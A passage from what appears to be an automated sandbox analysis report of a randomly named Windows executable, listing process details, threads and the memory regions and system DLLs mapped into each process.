(normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3436 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3437 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3438 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3439 start_va = 0x5a0000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 3440 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3441 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3620 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3621 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3622 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3623 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3624 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3625 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3626 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 3627 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 3628 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3629 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 3630 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 3631 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3632 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3633 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3634 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3635 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3636 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3637 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3638 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3639 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3640 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3641 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3642 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 3770 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 3771 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3772 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 3773 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3774 start_va = 0x890000 end_va = 0xa17fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 3775 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 89 os_tid = 0x13d4 Thread: id = 104 os_tid = 0x838 Process: id = "15" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xd990000" os_pid = "0x13e4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3290 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3291 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3292 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3293 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3294 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3295 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3296 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3297 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3298 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3299 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 3300 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3301 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3302 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3303 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3304 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3305 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 3465 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 3466 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3467 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3468 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3469 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3470 start_va = 0x5b0000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 3471 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3472 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3473 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3474 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3475 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3476 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3477 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3650 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3651 start_va = 0x5b0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 3652 start_va = 0x730000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 3653 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 3654 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3655 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 3656 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 3657 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3658 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3659 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3660 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3661 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3662 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3663 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3664 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3665 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3666 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3667 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3668 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 3669 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 3670 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3671 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 3776 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3777 start_va = 0x830000 end_va = 0x9b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 3778 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 90 os_tid = 0x13c8 Thread: id = 105 os_tid = 0x82c Process: id = "16" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x10295000" os_pid = "0x13dc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3308 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3309 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3310 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3311 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3312 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3313 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3314 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3315 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3316 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3317 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 3318 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3319 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3320 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3321 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3322 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3323 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 3478 start_va = 0x630000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 3479 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3480 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3481 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3482 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3483 start_va = 0x640000 end_va = 0x8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3484 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3485 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3486 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3487 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3488 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3489 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3490 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3672 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3673 start_va = 0x640000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3674 start_va = 0x7f0000 end_va = 0x8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 3675 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 3676 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3677 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 3678 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 3679 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" 